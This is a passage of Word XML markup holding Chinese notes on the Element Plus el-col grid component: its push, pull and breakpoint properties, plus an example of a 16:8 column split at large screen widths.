    <w:p w14:paraId="4A1CB20A" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>栅格向右移动格数</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E71528" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41236C1C" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F73A14" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>pull</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>栅格向左移动格数</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="557BC4D1" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083A5E92" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424AB5F2" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>xs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">&lt;768px </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>响应式栅格数或者栅格属性对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4732D384" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E93730" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F6E3D0" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8E5EF5" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD9FEB" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sm</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>≥</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">768px </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>响应式栅格数或者栅格属性对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4CB5B7" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE401EC" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322AAFC6" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA60E21" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F78E19A" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>md</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>≥</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">992px </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>响应式栅格数或者栅格属性对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B73B414" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D022A8" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCE5423" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057E72AC" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F01ED8D" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>lg</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>≥</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">1200px </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>响应式栅格数或者栅格属性对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6803157C" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C1907" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D38F95C" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC313C4" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDA1BC5" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>xl</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>≥</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">1920px </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>响应式栅格数或者栅格属性对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D683F09" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234740BF" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8B9841" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295CF0A6" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D88CDAB" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>自定义元素标签</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34471042" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15026A31" w14:textId="254786A0" w:rsidR="00DA6FB9" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B0A961" w14:textId="77777777" w:rsidR="00DA6FB9" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="142E6B89" w14:textId="3098093C" w:rsidR="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidR="00E279DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定</w:t>
      </w:r>
      <w:r w:rsidR="00E279DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lg</w:t>
      </w:r>
      <w:r w:rsidR="00E279DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E279DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>md</w:t>
      </w:r>
      <w:r w:rsidR="00E279DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同情况，两个</w:t>
      </w:r>
      <w:r w:rsidR="00E279DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>col</w:t>
      </w:r>
      <w:r w:rsidR="00E279DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的页面占比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B60857" w14:textId="64207338" w:rsidR="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;el-col </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:lg="16" :md="12"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> class=" flex items-center justify-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E9DF8" w14:textId="3C6AB14C" w:rsidR="00DA6FB9" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;el-col </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:lg="8" :md="12"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> class=" bg-light-50 flex items-center justify-center flex-col"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DF019E" w14:textId="77777777" w:rsidR="00DA6FB9" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4DF206" w14:textId="6EF344A0" w:rsidR="00DA6FB9" w:rsidRDefault="009D3AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009D3AFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lg</w:t>
      </w:r>
      <w:r w:rsidRPr="009D3AFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009D3AFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>≥</w:t>
      </w:r>
      <w:r w:rsidRPr="009D3AFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1200px</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9CF35D" w14:textId="6D7BAD4D" w:rsidR="009D3AFE" w:rsidRDefault="009D3AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>16:8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4AB208" w14:textId="0D0F0901" w:rsidR="00DA6FB9" w:rsidRDefault="009D3AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14D926C9" wp14:editId="5F629E11">
            <wp:extent cx="3389411" cy="1485367"/>
            <wp:effectExtent l="0" t="0" r="1905" b="635"/>
            <wp:docPr id="214270379"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0379" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId190"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3398819" cy="1489490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9CE5A6" w14:textId="38CD1790" w:rsidR="00DA6FB9" w:rsidRDefault="009D3AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009D3AFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>md</w:t>
      </w:r>
      <w:r w:rsidRPr="009D3AFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
